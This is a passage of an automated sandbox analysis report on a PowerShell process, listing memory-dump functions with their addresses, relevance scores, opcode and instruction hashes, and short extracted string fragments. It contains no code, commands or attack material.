                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3439ab2cd19efd6a8f0008bf5fde0eca94c52ad0283676033d175b8e95e757b3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAE09A36B042118BDB092B34A40C3AE7A62EFC4329F04002EE61A87241CF29088383EA
                                                                                                                                                                                                                                                                                                                                  Function 04FD9550 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e48a2ea39296923aa5e2e9f2d1cbf2153af91009981eac38051cd1c558ece494
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b5e40422647aaf9552b885351613d02a042783b80b0146ba3b4da41105b0878a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e48a2ea39296923aa5e2e9f2d1cbf2153af91009981eac38051cd1c558ece494
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCD05E22B0212117165431FA1C00BBBB5CF8EC44E5B0D0236DA09C3241EC80EC0703F1
                                                                                                                                                                                                                                                                                                                                  Function 04FDDD70 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8d7aa5e6df52d708c0a9fe7d0d90cceada37f573240180e687b6cec1e9dfe4b8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FE08632B00014978B089699D4504D9F7A6DBCC220F04847ED90AA7340DA3269168691
                                                                                                                                                                                                                                                                                                                                  Function 04FDDD20 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2910044686fbcaba550f2c3ccf67adcfc63a5edc3ab24b773013cb845ea5581d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f72d60e5080f70eedead8e6b558174ed324844e57136c840be3221ba6a123617
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2910044686fbcaba550f2c3ccf67adcfc63a5edc3ab24b773013cb845ea5581d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DE08C36740A144B8715A65EA81089FB69FDFC4661354452EE00A87740DE64EC068BE5
                                                                                                                                                                                                                                                                                                                                  Function 04FD8800 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 085b9667aad6bcd3ccca02d57ba8aa0836aed934ab222618edfa61d273cd4994
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6fc2e0d6ca57aae6fe528a8239cb12c35bf670bca1171e4847b3bd40e2b15a93
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 085b9667aad6bcd3ccca02d57ba8aa0836aed934ab222618edfa61d273cd4994
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDE0D83090934A4FCB14DF68D00546EBFF0EB46214B10429DD94687606D6701486DF82
                                                                                                                                                                                                                                                                                                                                  Function 04FD8739 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ac1d3bd9515d7ca6ea3c47cb13a1d895ea686696cae85949d612cd49787afd50
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9979c9d175033dab239de56dada01491142afeae8bd097d3e42d5255057b419e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac1d3bd9515d7ca6ea3c47cb13a1d895ea686696cae85949d612cd49787afd50
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CE08C36E0514ACBDF09BBA4E9596EE7F70FE05301F40019DE96752891EA701ACBCBC2
                                                                                                                                                                                                                                                                                                                                  Function 04FDF460 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ad552227c9480743480cf58c801861935bd1facc9749dd9edbe133f1a37115a8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 297089b8a9851594cbce7cfcc0d438ea298b7b647e202891181480bac804db2e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad552227c9480743480cf58c801861935bd1facc9749dd9edbe133f1a37115a8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4E04F70E0114A9F8780DFBCC44556EFFF0EF48204B1085EED909DB311E6728612CB91
                                                                                                                                                                                                                                                                                                                                  Function 04FDF470 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3dd91ac5091b21107ec9e4ccd9fe2ed28cfae10ffedef401a8d129a5904a4f3b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FD067B1D042099F8780EFADC94156EFBF4EB49200F6485AA8919E7301F7329A12CBD1
                                                                                                                                                                                                                                                                                                                                  Function 04FD8748 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 251900588a69141179aff8c1dee64eed17fd22a61dbde7c18952d3d9d3aef899
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 417f9002e912f2ab71302e177e804a395819a3611f0decf6281f063cff1264eb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 251900588a69141179aff8c1dee64eed17fd22a61dbde7c18952d3d9d3aef899
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94D067359042098BCB08ABA5E85A5BDBB74FB14302F40416DE92752591EA312A9BCAC5
                                                                                                                                                                                                                                                                                                                                  Function 04FD8810 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fc7b6d385f555c3a5822ac0689efec10e1ee722c2aaa077d5cdb90fd843c751c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 56ceacc002f0dbd7e2dfe97f230aba468597d1a49f028c8009c585ebfc2d81d0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc7b6d385f555c3a5822ac0689efec10e1ee722c2aaa077d5cdb90fd843c751c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9D05E35E0830A8FCB08EFA4E44696EBFB5EB48300F004169DE5A93744EA306D82CFC1
                                                                                                                                                                                                                                                                                                                                  Function 04FD7EA0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 758df21ab63925da759819a3db377633f438e77870d8142a938a2c67b58f748f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ba475005673489345e50fb6fe67f125a10126894b9fb57c7f080a11baaa25940
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 758df21ab63925da759819a3db377633f438e77870d8142a938a2c67b58f748f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73C08C1080D3808EEF425B314E7A0023F70DE4720832606C2CA818B432DF298C00E301
                                                                                                                                                                                                                                                                                                                                  Function 04FD7938 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 54ada781a751c46aa4813921d75b5f416f1cfa763d75a7f3ff6ed63f7f36f116
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e0e592e1251512b5f1f70c007475c64cbbdcd1185e24368c421d995c2c2c5e4e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54ada781a751c46aa4813921d75b5f416f1cfa763d75a7f3ff6ed63f7f36f116
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97C0123444A348EBCB446B7890608483B61EF8221932004DDEA4B4BAA3CA72904ADB01
                                                                                                                                                                                                                                                                                                                                  Function 04FD7940 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 96913143174faa81e3e6a2a0d1890e7683c030e31b05e44c9d34b99c4104ca59
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a86b8a15e23a2c96bd8ab9959ab9d136807fb3d48cc96dd8b2d736b7136b0a4c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96913143174faa81e3e6a2a0d1890e7683c030e31b05e44c9d34b99c4104ca59
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DBB0923004470C8FC2486F79A4048147329EB8521938004ECEA0E0A6928E36E889CA45

                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 07E40E20 Relevance: 25.5, Strings: 20, Instructions: 498COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: fbq$4']q$4']q$84Kk$84Kk$`Q]q$`Q]q$`Q]q$`Q]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$rMk$rMk
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-557165794
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b7184ee53c3566bed83232a7400b14aaef64c1aa08330693165284c92f3a5ba7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 39d871c97dc803259c445ce508385b7b23ed749e048f222461e58919480f0f55
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7184ee53c3566bed83232a7400b14aaef64c1aa08330693165284c92f3a5ba7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B0223B070524ECFCF158F68E454AAA7BF6AF85305F1484BAE9018B291CB35DDC5CBA1
                                                                                                                                                                                                                                                                                                                                  Function 07E41EF8 Relevance: 15.2, Strings: 12, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: $c@j$4']q$4']q$84Kk$84Kk$tP]q$tP]q$JNk$JNk$JNk$JNk$JNk
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3537711116
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7893772f6c418929dbd5008e557304dad6f517251be686cd4cd2d39f067d6375
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fa6e77c53092b515905f29884fbe7ca86a6d1a3d9f78612f9b0d6190edb475ee
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7893772f6c418929dbd5008e557304dad6f517251be686cd4cd2d39f067d6375
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0512BB1B152068FCB344B69A414A67FBEAAFC1358F1484BBD6158B255CB35DCC2C3B1
                                                                                                                                                                                                                                                                                                                                  Function 07E40FB8 Relevance: 12.7, Strings: 10, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: fbq$84Kk$`Q]q$`Q]q$tP]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2051191206
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e3bc9a0d3371d311d82cbcb5cdc70c3390fa1d125614a5d9cc940e1cab17d168
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 32427763339c79c0bff05a0384985f0acdad9b5e1e2388491e89c89bae94988f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3bc9a0d3371d311d82cbcb5cdc70c3390fa1d125614a5d9cc940e1cab17d168
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9261BEB0A1620EDFDF24CF48E544BAA77F2BB45349F1990A5E8019B291C735DDC0CBA5
                                                                                                                                                                                                                                                                                                                                  Function 07E43678 Relevance: 8.9, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: 4']q$4']q$$]q$$]q$$]q$Ck$Ck
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3556525554
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d1af0ff8b5e96af341ad55b4fbb3351a970242e2f6e9e24d150ac782693586dd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e7375fedf14a9baefa816059698be729a71cafc108d1a180a0452d30aaea9f61
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1af0ff8b5e96af341ad55b4fbb3351a970242e2f6e9e24d150ac782693586dd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7851AAB17063469FCB245B29A8147A7FBB6BFC6250F24807BD485EB281DB35C885C7A1
                                                                                                                                                                                                                                                                                                                                  Function 04FD7A21 Relevance: 6.5, Strings: 5, Instructions: 243COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: tMMk$`^q$`^q$`^q$`^q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3832440206
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1ceb9b506e532d96e609d4214b1435c23f2d0365577e855e02b9a6dc7a8c72f1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9b4ef9dc2d90734f084d429e1a13c2d3059f77228c1075731f1c14b13c50fd78
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ceb9b506e532d96e609d4214b1435c23f2d0365577e855e02b9a6dc7a8c72f1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24B1C574E002099FDB54DFA9D990A9DFBF6FF88300F24862AD419AB315DB34A905CF90
                                                                                                                                                                                                                                                                                                                                  Function 04FD7A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: tMMk$`^q$`^q$`^q$`^q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3832440206
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c347ddb5e87a7e208fd27ab5085c8e7490eb65423e007bcff63f29a3191ca029
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 16e3df4c0ee148283d131d9913fa3912995608994d063f86e10764c44b4345c2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c347ddb5e87a7e208fd27ab5085c8e7490eb65423e007bcff63f29a3191ca029
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDB1A574E002099FDB54DFA9D990A9DFBF6FF88304F248629D819AB315DB34A905CF90
                                                                                                                                                                                                                                                                                                                                  Function 07E408B8 Relevance: 6.4, Strings: 5, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: fbq$4']q$4']q$rMk$rMk
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1225260034
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5930e81942d3154edd75dd11836e3dbd7d3d71c0e1911227d8dcf8604e1f4ed2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e779700d512065726eb97907bfcb5325aa52c8fe94863de953ba4aec3cedb92
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5930e81942d3154edd75dd11836e3dbd7d3d71c0e1911227d8dcf8604e1f4ed2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34413771B053568FC7299B3CA8105A9BBA1EFC6224F1480BBD645CB291D7308D85C7D1
                                                                                                                                                                                                                                                                                                                                  Function 07E41EF6 Relevance: 6.3, Strings: 5, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: 4']q$84Kk$tP]q$JNk$JNk
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-402265758
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e782a2a4ac414b146bf9688a9f56702c9f314a47a91695a45d5292d0afe74756
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c4341cc3581528a8ac0268480c13b8c46fd3db2c9b919d565eccdf5ed5d1c9cf
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e782a2a4ac414b146bf9688a9f56702c9f314a47a91695a45d5292d0afe74756
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA210FB0A0220ADFCF348E45E584B76F7E6BF80758F1890AAEB041B251C332D9D2C761
                                                                                                                                                                                                                                                                                                                                  Function 04FD7200 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
